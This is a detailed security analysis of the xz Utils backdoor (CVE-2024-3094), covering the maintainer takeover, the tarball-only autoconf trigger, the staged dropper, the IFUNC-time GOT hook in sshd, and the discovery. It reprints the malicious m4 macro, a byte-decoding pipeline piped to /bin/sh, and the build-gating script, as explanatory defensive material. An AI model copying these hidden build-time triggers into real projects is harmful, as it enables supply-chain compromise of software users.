The XZ backdoor (CVE-2024-3094)

Security report · printable summary

Hugo Sibony · Léa Bonet · EPITA · hugosibony.com/blog/xz-backdoor

Supply-chain backdoor in xz Utils leading to OpenSSH pre-authentication RCE

CVE: CVE-2024-3094
Target: xz Utils / liblzma → OpenSSH sshd
Affected versions: xz 5.6.0 and 5.6.1 release tarballs
Platform: x86_64 Linux distro builds using gcc/GNU ld
Severity: Critical
CVSS: 10.0
Vulnerability class: Supply-chain compromise / backdoor
Status: Publicly disclosed; affected distros rolled back
Authors: Hugo Sibony · Léa Bonet
Institution: EPITA - École d’ingénieurs en informatique

Executive summary

A two-year maintainer-takeover operation inserted a backdoor into the xz Utils 5.6.x release tarballs, causing malicious object code to be linked into liblzma.so.5 during selected Linux distribution builds. Through downstream OpenSSH/systemd linkage, the library could be loaded into sshd, where an IFUNC resolver ran before RELRO made the GOT read-only and redirected the GOT entry for RSA_public_decrypt. A specially crafted SSH certificate signed with the attacker’s private Ed448 key could then trigger command execution before authentication, yielding remote code execution in the root-owned SSH daemon. The attack was detected before reaching stable distributions because Andres Freund investigated a roughly 500 ms SSH login latency anomaly on Debian sid.

Confidentiality: Critical

Attacker-controlled code in root-owned sshd.

Integrity: Critical

Arbitrary command execution before authentication.

Availability: High

Service compromise, persistence, or process disruption.

  1. Arrival: maintainer takeover and trust accumulation
  2. Trigger: tarball-only autoconf macro execution
  3. Payload: multi-stage extraction and build gates
  4. Hijack: IFUNC-time GOT rewrite inside sshd
  5. Discovery: latency anomaly, tracing, rollback

On March 29, 2024 at 15:51 UTC, Andres Freund posted a short message to oss-security: "backdoor in upstream xz/liblzma leading to ssh server compromise". Within hours, Debian rolled sid back, Red Hat pulled Fedora 40 Beta and Rawhide, GitHub disabled the upstream tukaani-project organization, and CVE-2024-3094 received a CVSS score of 10.0.

What almost shipped was pre-authentication remote code execution in sshd. The backdoor was not in OpenSSH itself. It was hidden in liblzma, pulled into sshd only through downstream distribution patches and transitive dependencies.

Act I - Arrival

Jia Tan’s first xz commit landed in October 2021. Through 2022, sock-puppet accounts pressured maintainer Lasse Collin about review speed and release cadence. By November 2022, Jia Tan was listed as co-maintainer. By January 2023, he was signing releases.

The quiet takeover then moved outside ordinary code review. Four changes mattered:

Russ Cox’s xz-timeline has the dated primary sources for everything above.

I

Infiltration

Oct 2021 - Jan 2024
JiaT75 · preparatory

First public commit by Jia Tan

PR to libarchive that subtly weakens input sanitization (replaces safe_fprintf with fprintf). Merged.

Jigar Kumar · pressure

First pressure email to xz-devel

Sock-puppet email complaining that Jia Tan's patch isn't being merged.

"Patches spend years on this mailing list. There is no reason to think anything is coming soon."

Lasse Collin · context

Lasse mentions Jia Tan as future co-maintainer

Reply on xz-devel hinting Jia Tan might have a bigger role in the future.

"Jia Tan has helped me off-list with XZ Utils and he might have a bigger role in the future at least with XZ Utils."

Lasse Collin · context

Lasse pushes back on the pressure

Discloses ongoing burnout and long-term mental-health struggles, hinting that Jia Tan will likely take on a bigger role.

"I haven't lost interest but my ability to care has been fairly limited mostly due to longterm mental health issues but also due to some other things."

Jigar Kumar · pressure

Second pressure email

Demands a new maintainer; suggests the delays are unacceptable.

"With your current rate, I very doubt to see 5.4.0 release this year. The only progress since april has been small changes to test code."

Lasse Collin · preparatory

Jia Tan listed as co-maintainer

README.md updated to list both Lasse and Jia Tan as project maintainers.

Jia Tan · preparatory

Jia Tan takes over releases

v5.4.1 ships - the final release Lasse signs. Subsequent releases are signed by Jia Tan.

Jia Tan · preparatory

Adds himself as oss-fuzz primary contact

PR #9960 to google/oss-fuzz replaces the primary security contact for xz from lasse.collin@tukaani.org with jiat0218@gmail.com. Approved by Lasse and merged. From this point on, oss-fuzz vulnerability reports route to Jia Tan.

Jia Tan · preparatory

PR to disable IFUNC fuzzing in oss-fuzz

Jia Tan asks Google's oss-fuzz to disable IFUNC checks - a detail that only reads as suspicious in retrospect.

Jia Tan · preparatory

Breaks the Landlock sandbox feature-test

A commit titled 'Fix Linux Landlock feature test' rewrites the CMakeLists feature check as a multi-line C-source compile probe and slips a stray '.' on its own line into the source, so the probe can never compile. As a result, HAVE_LINUX_LANDLOCK is never defined and the runtime sandbox is silently disabled. The commit lands between 5.6.0 (Feb 24) and 5.6.1 (Mar 9), so it ships in 5.6.1.

II

Release

Feb - Mar 2024
Jia Tan · malicious

Malicious test files committed

Adds tests/files/bad-3-corrupt_lzma2.xz and good-large_compressed.lzma - disguised as test corpus, actually contain the obfuscated payload.

Jia Tan · malicious

xz-utils 5.6.0 released

Tarball ships with a modified m4/build-to-host.m4 that triggers the payload during ./configure. The modification exists only in the tarball, not in git.

Jia Tan · malicious

xz-utils 5.6.1 released

Updated payload - fixes Valgrind errors that were tipping off Debian's autopkgtest. The hurried fix is itself a tell.

Jia Tan · malicious

Updates SECURITY.md to prefer private email reports

Four days before discovery, Jia Tan changes xz's SECURITY.md to prefer reports sent over private email rather than via GitHub security advisories. Combined with the oss-fuzz contact change, vulnerability reports were now expected to flow privately to Jia Tan first - bypassing the wider community.

III

Discovery

Mar 29, 2024
Andres Freund · anomaly

Symptoms with sshd on Debian sid

Andres Freund notices, on a Debian sid box, valgrind errors and roughly 0.5 s of extra CPU time on ssh logins (clean: 0m0.299s; backdoored: 0m0.807s). His own framing in the disclosure is "odd symptoms around liblzma … over the last weeks"; the exact start date is not in the public record.

Andres Freund · trace

Tracing the divergence

Per the disclosure, Andres uses perf record -e intel_pt//ub to find where execution in the slow sshd diverges from a clean baseline, then attaches gdb with breakpoints before the divergence. The trail leads into liblzma's CRC64 path - which sshd has no upstream reason to call.

Andres Freund · disclosure

Public disclosure on oss-security

Distros · GitHub · response

Distros roll back, GitHub disables the org

Within hours: Debian rolls sid back to 5.4.5-0.2; Red Hat issues an urgent advisory pulling Fedora 40 Beta and Rawhide; Homebrew downgrades xz on macOS. GitHub disables the tukaani-project organization. CVE-2024-3094 is assigned the same day, scored 10.0.


Act II - The Trigger

By February 2024, Jia Tan signs releases and controls the security inbox. The hostile code lands next — not in git, but in the release tarball.

An xz release has two relevant artifacts: the git tag auditors inspect, and the release tarball distributions build. They should match. They did not.

The tarball contains generated autoconf files: ./configure and expanded .m4 macros. Almost nobody reviews that output line by line. The xz 5.6.x releases used that blind spot: the 5.6.1 tarball, compared here against its git tag, included an m4/build-to-host.m4 absent from git, disguised as a normal gnulib macro.

git tree (5.6.1 tag)

  • m4/
  • m4/.gitignore
  • m4/getopt.m4
  • m4/posix-shell.m4
  • tuklib_*.m4 (×7)

released tarball (xz-5.6.1.tar.gz)

  • m4/
  • m4/build-to-host.m4 ← injector
  • m4/getopt.m4
  • m4/gettext.m4
  • m4/host-cpu-c-abi.m4
  • m4/posix-shell.m4
  • tuklib_*.m4 (×7)
  • intl*.m4 (×8)
m4/build-to-host.m4 ships only in the tarball, not in the git tree.

The name is legitimate; the content is not. Compared with upstream gnulib, three additions carry the trigger:

m4/build-to-host.m4 - upstream gnulib vs xz-5.6.1.tar.gz
# build-to-host.m4
dnl Written by Bruno Haible.
AC_DEFUN([gl_BUILD_TO_HOST],
[
...
gl_final_[$1]="$[$1]"
gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
...
if test "x$gl_am_configmake" != "x"; then
gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
fi
AC_CONFIG_COMMANDS([build-to-host],
[eval $gl_config_gt | $SHELL 2>/dev/null],
[gl_config_gt="eval \$gl_[$1]_config"])
])
AC_DEFUN([gl_BUILD_TO_HOST_INIT],
[
gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
gl_sed_double_backslashes='s/\\/\\\\/g'
gl_sed_escape_doublequotes='s/"/\\"/g'
gl_path_map='tr "\t \-_" " \t_\-"'
])

After autoconf evaluates the macro, the m4 variables resolve into concrete shell:
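
A minimal Python sketch of that resolution, assuming the carrier file is tests/files/bad-3-corrupt_lzma2.xz (the fixture named in the timeline). The function names are illustrative and do not come from the tarball; the marker pattern and the tr sets are copied from the macro above.

```python
import re

# Marker pattern from gl_BUILD_TO_HOST_INIT:
# four '#', five alphanumerics, four '#', then end of line.
MARKER = re.compile(rb"#{4}[A-Za-z0-9]{5}#{4}$", re.MULTILINE)

# gl_path_map is tr "\t \-_" " \t_\-": swap tab<->space and '-'<->'_'.
PATH_MAP = bytes.maketrans(b"\t -_", b" \t_-")


def has_marker(data: bytes) -> bool:
    """Mimic the grep that selects the carrier file (gl_am_configmake)."""
    return MARKER.search(data) is not None


def prefix_from_path(path: str) -> str:
    """Mimic sed "s/.*\\.//g": keep only what follows the last dot."""
    return re.sub(r".*\.", "", path)


def resolved_command(path: str) -> str:
    """Assemble the pipeline that gl_[$1]_config expands to for this path."""
    tool = prefix_from_path(path)
    return f'sed "r\\n" {path} | tr "\\t \\-_" " \\t_\\-" | {tool} -d 2>/dev/null'


if __name__ == "__main__":
    print(resolved_command("tests/files/bad-3-corrupt_lzma2.xz"))
```

The point of the sketch is that no tool name is spelled out in the macro: the decompressor is derived from the carrier file's own extension, and the byte swap in PATH_MAP is what turns the deliberately "corrupt" fixture back into a valid stream.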

This is the central trick: the trigger lives only in the tarball. It exploits the gap between the repository people review and the generated artifact distributions actually build.

Act III - The Payload

The dropper is built to be boring at every layer: harmless-looking pieces, no obvious ELF payload on disk, and silent exits outside distro builds. The m4 trigger plus two compressed test fixtures unfold into one object file: liblzma_la-crc64-fast.o.

Stage 1 - the shell script that comes out

The m4-flow above produces a 1.3 KB shell script - Stage-1. It doesn’t do anything dangerous itself; its only job is to extract the next layer from the other test fixture, good-large_compressed.lzma.

Stage 2 - the chunker

Stage-1 runs this pipeline:

Stage-1.sh - extracting the payload from good-large_compressed.lzma
xz -dc good-large_compressed.lzma \
| <head-chunker> \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" \
| xz -F raw --lzma1 -dc \
| /bin/sh

The <head-chunker> repeatedly skips 1024 bytes and takes selected chunks from the middle of the file. The following tr table permutes all 256 byte values. The byte counts tell the story:

The 5.6.0 dropper uses different magic numbers (tail -c +31265, head -c +724, a different tr table) - same shape, version-specific constants.
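
The two transforms in that pipeline can be modelled in a few lines of Python. This is a sketch under assumptions: the tr set is copied from the 5.6.1 pipeline above, while the chunker's take size and round count are left as parameters because only the 1024-byte skip is stated here.

```python
import io
import re

# First tr argument from the Stage-1 pipeline; the second is \0-\377.
SET1 = r"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"


def expand_octal_ranges(spec: str) -> list:
    """Expand a tr set written as octal escapes and ranges into byte values."""
    out = []
    for lo, hi in re.findall(r"\\([0-7]{1,3})(?:-\\([0-7]{1,3}))?", spec):
        start = int(lo, 8)
        end = int(hi, 8) if hi else start
        out.extend(range(start, end + 1))
    return out


def build_table(set1_spec: str) -> bytes:
    """Build the 256-entry translation table tr would apply."""
    table = bytearray(range(256))  # bytes outside set1 map to themselves
    for position, source_byte in enumerate(expand_octal_ranges(set1_spec)):
        table[source_byte] = position  # set2 is \0-\377, so target == position
    return bytes(table)


def skip_take(stream, skip: int, take: int, rounds: int) -> bytes:
    """Generic chunker: discard `skip` bytes, keep `take` bytes, `rounds` times."""
    kept = bytearray()
    for _ in range(rounds):
        stream.read(skip)
        kept += stream.read(take)
    return bytes(kept)


if __name__ == "__main__":
    table = build_table(SET1)
    print(sorted(table) == list(range(256)))  # is it a full permutation?
    print(skip_take(io.BytesIO(bytes(range(12))), skip=2, take=4, rounds=2))
```

Because the six ranges in SET1 cover every value from 0 to 255 exactly once, the table is a substitution cipher over bytes rather than a lossy filter, which is why the output can still be a valid LZMA stream.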

Stage 3 - the gates

Before it extracts the ELF object, Stage-2 gates aggressively. Each check below means “if this looks wrong, exit silently - no error, no message, no trace”:

Stage-2.sh - the build-environment gate (condensed)
[ "$(uname)" != "Linux" ] && exit 0 # not Linux
echo "$build" | grep -Eq "^x86_64.*linux-gnu$" || exit 0 # not x86_64 Linux ABI
[ "$CC" = "gcc" ] && [ "$GCC" = "yes" ] || exit 0 # not gcc
$LD -v 2>&1 | grep -q "GNU ld" || exit 0 # not GNU ld
[ "$enable_shared" = "yes" ] || exit 0 # not building a shared library
test -f "$srcdir/debian/rules" || [ "$RPM_ARCH" = "x86_64" ] || exit 0 # not a Debian or x86_64 RPM build
grep -q 'HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h || exit 0 # IFUNC support not detected

The dropper fires only inside a real x86_64 Linux distro packaging job. Anything else - CI sandboxes, fuzzers, builds outside Debian or RPM packaging - exits silently. Documented in Sam James’s canonical FAQ.
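
To make the combined effect of the gate easier to reason about, here is a hedged Python model of the condensed checks above. The BuildEnv type and its field names are invented for illustration; each condition mirrors one line of the condensed script, not the full Stage-2 source.

```python
import re
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class BuildEnv:
    """Hypothetical snapshot of the variables the condensed gate inspects."""
    uname: str
    build: str             # autoconf $build triplet
    cc: str                # $CC
    gcc: str               # autoconf $GCC
    ld_version: str        # output of `$LD -v`
    enable_shared: str     # $enable_shared
    has_debian_rules: bool # does $srcdir/debian/rules exist?
    rpm_arch: str          # $RPM_ARCH
    config_h: str          # contents of config.h


def dropper_would_fire(env: BuildEnv) -> bool:
    """Return True only if every condensed gate check passes."""
    checks = [
        env.uname == "Linux",
        re.search(r"^x86_64.*linux-gnu$", env.build) is not None,
        env.cc == "gcc" and env.gcc == "yes",
        "GNU ld" in env.ld_version,
        env.enable_shared == "yes",
        env.has_debian_rules or env.rpm_arch == "x86_64",
        "HAVE_FUNC_ATTRIBUTE_IFUNC 1" in env.config_h,
    ]
    return all(checks)


if __name__ == "__main__":
    debian = BuildEnv("Linux", "x86_64-pc-linux-gnu", "gcc", "yes", "GNU ld 2.42",
                      "yes", True, "", "#define HAVE_FUNC_ATTRIBUTE_IFUNC 1\n")
    print(dropper_would_fire(debian))                       # packaging-like build
    print(dropper_would_fire(replace(debian, cc="clang")))  # any mismatch exits
```

Every check is a conjunction, so a single mismatch (a different compiler, a non-packaging build directory) is enough to keep the payload dormant.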

What landed

The extracted object is small (88,664 bytes) but deliberately noisy. It has 242 section headers, because the object was built with -ffunction-sections -fdata-sections. Every function and data object gets its own section, burying the malicious symbols in a long, plausible list.
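
The section-header count is easy to check independently of any disassembler, since it is a fixed field (e_shnum) in the ELF file header. The sketch below assumes a little-endian ELF64 object, which is what an x86_64 .o is; the function name is illustrative.

```python
import struct

# Little-endian ELF64 file header (64 bytes):
# e_ident, e_type, e_machine, e_version, e_entry, e_phoff, e_shoff,
# e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
ELF64_HEADER = struct.Struct("<16sHHIQQQIHHHHHH")


def section_header_count(header: bytes) -> int:
    """Return e_shnum from the first 64 bytes of a little-endian ELF64 file."""
    fields = ELF64_HEADER.unpack_from(header)
    ident = fields[0]
    # ident[4] == 2 means ELFCLASS64, ident[5] == 1 means little-endian.
    if ident[:4] != b"\x7fELF" or ident[4] != 2 or ident[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    return fields[12]  # e_shnum


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        print(section_header_count(fh.read(ELF64_HEADER.size)))
```

Run against a copy of the extracted object, this should agree with the count that readelf -h reports as "Number of section headers". Files with 0xff00 or more sections store the count elsewhere, which does not apply at this size.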

The important symbols, per smx-smx/xzre, are:

  • _get_cpuid — the IFUNC entry point.
  • _cpuid — a CPUID helper used as camouflage.
  • .Lx86_code.part.0 — an opaque ~2.7 KB blob holding the runtime payload.

Once linked into liblzma.so.5, the object becomes part of a signed, hash-verified Debian or Fedora package. The package checks pass, because they verify the binary as built — and the binary as built contains the backdoor.

Act IV - The Hijack

The runtime attack needs two conditions: liblzma loaded inside sshd, and a writable function pointer before startup hardening finishes.

The path

Upstream OpenSSH doesn’t link libsystemd. The chain that brings liblzma into sshd has two links that no single auditor watches end-to-end: a downstream sd_notify patch that links sshd against libsystemd, and libsystemd’s own dependency on liblzma.

ldd /usr/sbin/sshd · Debian sid (excerpt)
libcrypto.so.3 => /lib/x86_64-linux-gnu/libcrypto.so.3
libsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 # via downstream sd_notify patch
liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 # transitive - pulled by libsystemd

A loaded library shares its host process. Once liblzma.so.5 is mapped into sshd, it can touch sshd memory, including GOT entries and function pointers. Since sshd runs as root, code execution there is remote root. The setup happens before any client connects, during ld.so startup.

IFUNC, before RELRO

An IFUNC symbol is resolved by running a small resolver during process startup. xz already used this for CRC64, choosing between a fast CPU-specific implementation and a fallback. The backdoor hides inside that existing dispatch path; it does not add a suspicious new mechanism.

The timing is the bug-shaped gap: IFUNC resolvers run before RELRO makes the GOT read-only. During that window, a resolver can rewrite GOT entries. Full RELRO still arrives, just too late.

The resolver - installing the hook

The installer is split across two lookalike functions:

  • _get_cpuid — the legitimate-looking IFUNC resolver glibc calls during startup.
  • _get_cpuia — the hidden helper it calls as a side effect; this one installs the hook.

That split is the camouflage. _get_cpuid still returns valid CPUID data, so startup continues normally. The suspicious part is one callq at offset 0x27. In the disassembly it appears to call the next instruction, still inside _get_cpuid; that is misleading because this is an unlinked object and the call target is still a relocation placeholder.

Unlinked object · _get_cpuid contains a relocation-backed call
0000000000000000 <_get_cpuid>:
0: f3 0f 1e fa endbr64
4: 55 pushq %rbp
5: 48 89 f5 movq %rsi, %rbp
8: 4c 89 ce movq %r9, %rsi
b: 53 pushq %rbx
c: 89 fb movl %edi, %ebx
e: 81 e7 00 00 00 80 andl $0x80000000, %edi
14: 48 83 ec 28 subq $0x28, %rsp
18: 48 89 54 24 18 movq %rdx, 0x18(%rsp)
1d: 48 89 4c 24 10 movq %rcx, 0x10(%rsp)
22: 4c 89 44 24 08 movq %r8, 0x8(%rsp)
27: e8 00 00 00 00 callq 0x2c <_get_cpuid+0x2c>
2c: 85 c0 testl %eax, %eax
2e: 74 27 je 0x57 <_get_cpuid+0x57>

The relocation reveals the real target:

0000000000000028: R_X86_64_PC32 .text._get_cpuia-0x4
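
The arithmetic behind both observations fits in a short Python sketch. R_X86_64_PC32 stores S + A - P in the 4-byte field, where S is the symbol address, A the addend (-4 here) and P the field's own address (0x28); the symbol address used in the example is hypothetical.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF


def call_target(insn_addr: int, rel32: int) -> int:
    """Target of a 5-byte `e8 rel32` call: next instruction plus displacement."""
    return (insn_addr + 5 + rel32) & MASK64


def apply_pc32(symbol_addr: int, addend: int, field_addr: int) -> int:
    """R_X86_64_PC32: the stored value is S + A - P, truncated to 32 bits."""
    return (symbol_addr + addend - field_addr) & 0xFFFFFFFF


def to_signed32(value: int) -> int:
    """Interpret a 32-bit field as the signed displacement the CPU uses."""
    return value - (1 << 32) if value & 0x80000000 else value


if __name__ == "__main__":
    # Unlinked: the field is all zeros, so the call "targets" 0x27 + 5.
    print(hex(call_target(0x27, 0)))
    # Linked, with a hypothetical address for _get_cpuia:
    hypothetical_symbol = 0x1000
    rel = apply_pc32(hypothetical_symbol, -4, 0x28)
    print(hex(call_target(0x27, to_signed32(rel))))
```

The -4 addend exists because the CPU adds the displacement to the address of the next instruction (field address plus 4), not to the field itself; the two offsets cancel and the call lands exactly on the symbol.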

After linking, the call jumps to _get_cpuia — a deliberate typo sitting next to _get_cpuid in the symbol table. Its job is simple:

The important point is the data path, not the basic blocks: walk _r_debug, find sshd’s link_map, parse its .dynsym, locate RSA_public_decrypt, and overwrite that GOT slot. By the time _get_cpuid returns to glibc, the pointer is already poisoned; RELRO then freezes it.
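
The ordering problem can be shown with a deliberately simplified Python model. Nothing here reflects real loader internals: the GOT is a dictionary, RELRO is a read-only view, and every class and function name is invented for the illustration.

```python
from types import MappingProxyType


def libcrypto_rsa_public_decrypt(data: bytes) -> str:
    return "libcrypto"


def hook_rsa_public_decrypt(data: bytes) -> str:
    return "liblzma stub"


class ToyProcess:
    """Toy stand-in for a starting sshd: loaded objects plus one GOT slot."""

    def __init__(self):
        self.link_map = ["sshd", "libcrypto.so.3", "libsystemd.so.0", "liblzma.so.5"]
        self.got = {"RSA_public_decrypt": libcrypto_rsa_public_decrypt}
        self.ifunc_resolvers = []

    def start(self):
        for resolver in self.ifunc_resolvers:
            resolver(self)                     # the GOT is still writable here
        self.got = MappingProxyType(self.got)  # model of RELRO: read-only view


def backdoored_resolver(proc: ToyProcess) -> str:
    """Does its nominal job, and rewrites one slot as a side effect."""
    if "sshd" in proc.link_map and "RSA_public_decrypt" in proc.got:
        proc.got["RSA_public_decrypt"] = hook_rsa_public_decrypt
    return "crc64_fast"


if __name__ == "__main__":
    proc = ToyProcess()
    proc.ifunc_resolvers.append(backdoored_resolver)
    proc.start()
    print(proc.got["RSA_public_decrypt"](b""))
```

After start() returns, the slot can no longer be changed by anyone, including a defender: the protection that was meant to stop this kind of rewrite ends up preserving it.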

The hook - at request time

The runtime payload avoids obvious strings: names such as RSA_public_decrypt are resolved indirectly during the link_map walk. A simple string scan of the object is therefore unhelpful.

By the time sshd reaches main(), one GOT entry has changed. RSA_public_decrypt no longer points to libcrypto; it points to a stub inside liblzma. Everything else is left alone:

At request time, the hook waits for certificate authentication. OpenSSH thinks it is verifying an RSA value. The stub interprets the same bytes as a small command frame:

The gate

The signature scheme is Ed448, not Ed25519: EdDSA over edwards448, with roughly 224-bit classical security. amlweems/xzbot confirmed it with a working proof-of-concept, extracted the embedded public key, and shipped a honeypot patch for OpenSSH. Without the matching private key, even a connection that knows the modulus layout never reaches command execution. The gate limited the blast radius to whoever held that key and blocked opportunistic abuse from the moment the binary shipped.
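
The shape of such a gate can be sketched generically. This is not the payload's actual parser: the tag size and the choice of signed message are assumptions made for illustration, and signature verification is passed in as a callable rather than implemented. The only fixed fact used is that an Ed448 signature is 114 bytes long.

```python
from typing import Callable, Optional

ED448_SIGNATURE_LEN = 114  # Ed448 signatures are 114 bytes (RFC 8032)
TAG_LEN = 16               # ASSUMPTION: illustrative tag size, not from the payload


def gated_command(frame: bytes,
                  verify: Callable[[bytes, bytes], bool]) -> Optional[bytes]:
    """Split a frame into tag, signature, command; release the command only if verified.

    `verify(signature, message)` stands in for an Ed448 check against an
    embedded public key. Returning None models "fall through silently".
    """
    header_len = TAG_LEN + ED448_SIGNATURE_LEN
    if len(frame) <= header_len:
        return None
    tag = frame[:TAG_LEN]
    signature = frame[TAG_LEN:header_len]
    command = frame[header_len:]
    # ASSUMPTION: the signed message is tag + command.
    if not verify(signature, tag + command):
        return None
    return command


if __name__ == "__main__":
    always_reject = lambda signature, message: False
    print(gated_command(b"\x00" * 200, always_reject))  # unsigned frames yield nothing
```

The design property worth noticing is that failure is indistinguishable from normal operation: a frame that fails verification produces no command and no error, so probing the hook without the key reveals nothing.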

Act V - The Discovery

What caught the backdoor was a half-second of CPU on every ssh login. A login attempt against a clean sshd took 0m0.299s; the same attempt against a backdoored liblzma took 0m0.807s.

The tools Andres Freund named in his disclosure:

  • valgrind - memory-error detector. Caught the bad reads and writes.
  • perf record -e intel_pt//ub - Intel Processor Trace, recording every instruction. Pinpointed where the slow run diverged from a clean baseline.
  • gdb - breakpoints just before that divergence.

The trail led into liblzma’s CRC64 path - a function sshd has no upstream reason to call - and into the redirected RSA_public_decrypt. He posted the disclosure to oss-security:

After observing a few odd symptoms around liblzma (part of the xz package) on Debian sid installations over the last weeks (logins with ssh taking a lot of CPU, valgrind errors) I figured out the answer: The upstream xz repository and the xz tarballs have been backdoored. - Andres Freund, oss-security 2024/03/29/4 ↗

Figure: sshd connection time, clean (pre-5.6, 299 ms) vs backdoored (5.6.x, 807 ms).

Aftermath

Within seven days of Andres’s email, every affected distribution shipped a rollback: Debian rolled sid back to a pre-5.6 xz; Red Hat pulled Fedora 40 Beta and Rawhide; openSUSE, Arch, and Kali pulled or downgraded; Homebrew downgraded xz on macOS as a precaution. GitHub disabled the tukaani-project organization for several days, then re-enabled it under Lasse Collin’s sole control. Lasse published a maintainer’s statement at tukaani.org/xz-backdoor.

Shipped & exploitable (5)
  1. Debian sid 5.6.0 / 5.6.1

    Rolled back to 5.4.5-0.2 on 2024-03-29.

  2. Fedora 40 Beta 5.6.0 / 5.6.1

    Red Hat issued urgent advisory.

  3. Fedora Rawhide 5.6.x
  4. openSUSE Tumbleweed 5.6.1
  5. Kali rolling 5.6.0 (briefly)

    Pulled within hours.

Shipped but inert (2)
  1. Arch Linux 5.6.0 / 5.6.1

    Arch's openssh does not link libsystemd by default - backdoor present but path to sshd missing.

  2. Alpine edge 5.6.x

    musl, not glibc - wrong ABI for the IFUNC trick.

Never shipped (4)
  1. Debian stable 5.4.x only

    Stable never received the malicious release.

  2. Ubuntu LTS 5.4.x only

    All LTS lines safe.

  3. RHEL ≤5.2.4

    Stable Red Hat never shipped 5.6.

  4. Amazon Linux ≤5.2.5

The vulnerable releases reached rolling and pre-release distributions only. Stable lines - Debian stable, Ubuntu LTS, RHEL, Amazon Linux - were still on pre-5.6 versions and were never exposed.

What this attack proved

01 · Startup code can beat hardening

IFUNC resolvers run before RELRO makes the GOT read-only. A library loaded into sshd can rewrite function pointers during that window.

02 · Maintainer trust is attack surface

Two years of contributions, pressure emails, and role expansion were enough to put hostile bytes into a library every distro ships.

03 · The only alarm was latency

No fuzzer, SBOM check, or reproducible-build audit caught it. A developer noticed sshd was slow and followed the anomaly.

Attribution - who was Jia Tan?

What Jia Tan did is on the record. Who Jia Tan was - real name, real geography, employer - is not public and may never be. The most rigorous open analysis to date is by Rhea Karty (Dartmouth) and Simon Henniger (TU Munich), published in April 2024.

Timezone - claimed vs actual

Almost every Jia Tan commit is timestamped UTC+8 - China Standard Time. A handful are stamped UTC+2 or UTC+3 - Eastern European Time and its summer variant. Forgetting to set a fake timezone before committing is a one-way error: someone really in UTC+8 will not accidentally produce UTC+3 timestamps, but someone in EET who forgets to fake the timezone will.

The slipups Karty and Henniger logged are concrete:

  • 2022-10-06: two commits ~11 hours apart, one stamped +0300, the other +0800.
  • 2023-06-27: two commits minutes apart, one stamped +0300, the other +0800.
  • Total: 3 commits stamped UTC+02, 6 stamped UTC+03, all the rest UTC+08.
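
A tally like this is straightforward to reproduce from author timestamps. The sketch below assumes ISO-8601 strings such as those printed by git log --format=%aI; the function names are illustrative, and any timestamps fed to it here are made-up inputs, not data from the repository.

```python
from collections import Counter
from datetime import datetime, timedelta, timezone


def offset_histogram(stamps):
    """Count commits per UTC offset, e.g. {'+0800': 2, '+0300': 1}."""
    return Counter(datetime.fromisoformat(s).strftime("%z") for s in stamps)


def local_hour(stamp: str, real_offset_hours: int) -> int:
    """Hour of day the commit would show on a clock set to `real_offset_hours`."""
    real_zone = timezone(timedelta(hours=real_offset_hours))
    return datetime.fromisoformat(stamp).astimezone(real_zone).hour


if __name__ == "__main__":
    # Hypothetical timestamps, for illustration only.
    sample = [
        "2023-01-24T20:48:00+08:00",
        "2023-06-27T17:27:00+03:00",
        "2023-06-27T22:40:00+08:00",
    ]
    print(offset_histogram(sample))
    print([local_hour(s, 3) for s in sample])
```

The first function surfaces the rare offsets that break the pattern; the second re-expresses every commit on the suspected real clock, which is the adjustment the work-hours analysis relies on.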

Work hours and weekdays

Jia Tan’s commit hours, adjusted from the spoofed +0800 to actual +0200/+0300, cluster between 09:00 and 18:00 - a regular office workday in Eastern European Time. Across all 452 commits Jia Tan landed on tukaani-project/xz between January 2022 and March 2024, the day-of-week distribution is distinctly weekday-shaped:

The shape reads as someone working a regular office job - not as someone moonlighting on a covert project after hours.

Chinese holidays

If Jia Tan were actually in mainland China, two periods in 2023 should show activity gaps: the Lunar New Year (January 22–27) and the Mid-Autumn Festival (September 29). Neither does. Jia Tan committed normally through both. Specific examples, verifiable on GitHub:

  • 2023-01-24, 12:48 UTC - liblzma: Fix documentation in filter.h for lzma_str_to_filters() - f35d98e2
  • 2023-01-27, 12:14 UTC - Translations: Add Brazilian Portuguese translation of man pages - 3b1c8ac8
  • 2023-09-29, 11:58 UTC - CMake: Specify LINKER_LANGUAGE for libgnu target - 506d0312
  • 2023-09-29, 14:11 UTC - CI: Disable CLANG64 MSYS2 environment until bug is resolved - 01e34aa1

Three commits on the Mid-Autumn Festival itself; routine maintenance work spread across the Lunar New Year week. Not the cadence of someone observing the holidays.

Sock-puppet coordination

The pressure emails came from accounts (Jigar Kumar, Dennis Ens) with no public footprint anywhere else online. Their timing aligned with what Jia Tan needed at each step. Whether this was one operator using two email addresses or two coordinated operators is not known from the public record. Either way, the accounts were almost certainly part of the same operation.

What we don’t know

Patience (≥2 years), the budget to keep an identity active that long, and the sophistication of the runtime payload are all consistent with a state-aligned actor rather than a freelancer or a criminal group. Public attribution nonetheless remains speculative: no government has named a suspect, and no suspect has been arrested. Treat any specific naming you see online as unverified.

Notes & sources

Every claim above is sourced to the references below. They’re listed in roughly the order you’d want to read them to follow the attack end-to-end.

Disclosure & timeline

  • Andres Freund - oss-security disclosure (2024-03-29) - the original public disclosure. Quoted verbatim in Act V; the body of the email is the source for the timing measurements and the tools Andres used to chase the symptoms.
  • Russ Cox - Timeline of the xz attack - dated, conservative reconstruction of the social-engineering campaign with primary-source citations for every event. Act I’s Timeline component is built from this.
  • Sam James - canonical FAQ - community-maintained FAQ kept current as findings landed. Source for the build-environment gate (x86_64 Linux, gcc, GNU ld, Debian/RPM packaging context) and the dependency chain through libsystemd.

The dropper (Acts II–III)

  • Russ Cox - The xz attack shell script - byte-level walk through m4/build-to-host.m4, the two test fixtures, and the multi-stage dropper. Acts II and III are cross-checked against this throughout.

The runtime payload (Act IV)

